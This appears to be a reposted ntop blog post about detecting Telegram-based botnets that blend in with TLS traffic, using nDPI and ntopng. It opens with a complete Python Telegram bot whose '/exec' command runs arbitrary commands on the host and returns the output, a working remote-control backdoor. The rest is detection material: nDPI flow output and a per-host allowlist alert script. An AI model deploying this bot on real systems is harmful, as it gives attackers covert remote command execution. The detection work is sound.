A botnet is a popular method for running malware on a network using a command-and-control paradigm. Popular protocols used by botnets include IRC and HTTP. Most IDS can detect zombies if they are able to inspect the network traffic. When zombie programs turn to encrypted and cloud-based protocols (i.e., those you cannot block with simple IP-based ACLs), they become a blind spot for network administrators. The popular Telegram messaging system allows people to create a botnet in minutes, as shown in the code snippet below (indentation restored and the `telepot` imports it relies on added; the bot token is a placeholder):

```python
import subprocess
import time

from telepot import Bot, glance
from telepot.loop import MessageLoop

token = '<BOT_TOKEN>'  # placeholder: the real token is not part of the snippet

bot = Bot(token)


def run():
    """ Runs the function used to start the bot.
    """
    MessageLoop(bot,
                {'chat': on_chat_message}
                ).run_as_thread()
    print('Listening ...')
    while 1:
        time.sleep(10)


##
def help(bot, chat_id):
    bot.sendMessage(chat_id, 'Available commands:')
    bot.sendMessage(chat_id, '/exec Execute remote command')


##
def run_command(command):
    p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    return p.stdout.read().decode('utf-8')


##
def on_chat_message(msg):
    """ Manages the predefined commands of the telegram bot.
    :param msg: message received from telegram.
    """
    #print(msg)
    content_type, chat_type, chat_id = glance(msg)
    #
    # Check if the content_type of the message is a text
    if content_type == 'text':
        txt = msg['text'].lower()
        #
        # Switch construct to manage the various commands
        if txt.startswith("/exec"):
            cmd = txt[6:]
            bot.sendMessage(chat_id, 'Executing command ['+cmd+']...')
            bot.sendMessage(chat_id, run_command(cmd.split(' ')))
        else:
            help(bot, chat_id)


run()
```
As you can see, you can initiate a botnet on a remote system and execute arbitrary commands.

Suppose now that one of your colleagues lets this simple botnet run inside your network. The firewall sees connections to port 443 (or a similar port), treats them as ordinary TLS traffic and lets them pass.

From the diagram above, you can see that this Telegram traffic looks like TLS, but it is not TLS, so you cannot rely on TLS-based detection aspects such as certificates and JA3. You can imagine the consequences of running these simple tools on the network. Essentially, your network is exposed, and the firewall or popular non-DPI-based IDS like Suricata or Zeek can’t do anything about it.

Fortunately, nDPI can detect it:

```
Detected protocols:
Telegram packets: 156 bytes: 44034 flows: 2
Protocol statistics:
Acceptable 44034 bytes
1 TCP 192.168.1.110:52671 <-> 149.154.167.91:443 [proto: 91.185/TLS.Telegram][cat: Chat/9][76 pkts/9307 bytes <-> 74 pkts/33973 bytes][Goodput ratio: 46/86][3.75 sec][bytes ratio: -0.570 (Download)][IAT c2s/s2c min/avg/max/stddev: 0/0 58/59 1817/1852 264/272][Pkt Len c2s/s2c min/avg/max/stddev: 66/70 122/459 846/1294 133/446]
2 TCP 192.168.1.110:52672 <-> 149.154.167.91:443 [proto: 91.185/TLS.Telegram][cat: Chat/9][4 pkts/445 bytes <-> 2 pkts/309 bytes][Goodput ratio: 38/55][0.07 sec][bytes ratio: 0.180 (Mixed)][IAT c2s/s2c min/avg/max/stddev: 0/36 23/36 35/36 16/0][Pkt Len c2s/s2c min/avg/max/stddev: 66/74 111/154 235/235 72/80]
```
So all our ntop tools (like ntopng, nprobe…) can address this issue. Now that you realize you’re not invincible anymore, you have two options:
- Visibility (e.g., using ntopng)
- Use ntopng Edge to block this traffic.
In ntopng, you can specify what protocols a device can run.

Thus, you can alert when unwanted protocols are run on critical hosts such as servers. This covers every protocol nDPI supports, and therefore includes Telegram.
If you want to see more security-oriented alerts, you can customize user scripts and enable behavior checks that interest you.
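To make the two points above concrete (a port-based view labels the flow "TLS" while DPI labels it "TLS.Telegram", and a per-host protocol policy turns that into an alert), here is an added example that is not part of the original post nor ntop's code. It parses flow lines in the ndpiReader layout quoted above; the first two sample lines are the page's own flows, the third (a plain TLS flow to 203.0.113.10) and the per-host policy `POLICY` are constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample: the two Telegram flows from the page plus one ordinary
# TLS flow (constructed, documentation address) for contrast.
SAMPLE_FLOWS = """\
1 TCP 192.168.1.110:52671 <-> 149.154.167.91:443 [proto: 91.185/TLS.Telegram][cat: Chat/9][76 pkts/9307 bytes <-> 74 pkts/33973 bytes]
2 TCP 192.168.1.110:52672 <-> 149.154.167.91:443 [proto: 91.185/TLS.Telegram][cat: Chat/9][4 pkts/445 bytes <-> 2 pkts/309 bytes]
3 TCP 192.168.1.110:52680 <-> 203.0.113.10:443 [proto: 91/TLS][cat: Web/5][10 pkts/1200 bytes <-> 12 pkts/8000 bytes]
"""

# Matches the fixed prefix of an ndpiReader flow line up to the [proto: ...] tag.
FLOW_RE = re.compile(
    r"^\s*\d+\s+(?P<l4>TCP|UDP)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+<->\s+"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)\s+"
    r"\[proto:\s*(?P<proto_ids>[\d.]+)/(?P<proto>[^\]]+)\]"
)


@dataclass
class Flow:
    l4: str
    src: str
    sport: int
    dst: str
    dport: int
    proto: str  # nDPI label, e.g. "TLS.Telegram" (master.app) or just "TLS"

    @property
    def app(self):
        # The application protocol is the last dotted component of the label.
        return self.proto.split(".")[-1]


def parse_flows(text):
    """Parse ndpiReader flow lines; lines that do not match are skipped."""
    flows = []
    for line in text.splitlines():
        m = FLOW_RE.match(line)
        if m:
            flows.append(Flow(m["l4"], m["src"], int(m["sport"]),
                              m["dst"], int(m["dport"]), m["proto"]))
    return flows


def port_guess(flow):
    """What a port-based firewall rule sees: only the server port."""
    return {443: "TLS", 80: "HTTP", 53: "DNS"}.get(flow.dport, "Unknown")


# Constructed per-host policy: the application protocols a critical host may speak.
POLICY = {
    "192.168.1.110": {"TLS", "HTTP", "DNS"},
}


def check_policy(flows, policy):
    """Return one alert per flow whose DPI-detected app is outside the host's allowlist."""
    alerts = []
    for f in flows:
        allowed = policy.get(f.src)
        if allowed is None:
            continue  # host has no policy, nothing to enforce
        if f.app not in allowed:
            alerts.append({
                "host": f.src,
                "peer": f"{f.dst}:{f.dport}",
                "port_view": port_guess(f),  # what the firewall believed
                "dpi_view": f.proto,         # what nDPI actually detected
            })
    return alerts


if __name__ == "__main__":
    for a in check_policy(parse_flows(SAMPLE_FLOWS), POLICY):
        print(f"ALERT {a['host']} -> {a['peer']}: "
              f"port says {a['port_view']}, DPI says {a['dpi_view']}")
```

The alert records both views side by side, which is the useful artefact for triage: the port view explains why the firewall let the flows through, and the DPI view is what the allowlist decision is made on.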

We hope this helps you keep your network secure and that network administrators are no longer blind.
Original Declaration: This article is authorized by the author for publication by the Tencent Cloud Developer Community. Reprinting is not allowed without permission.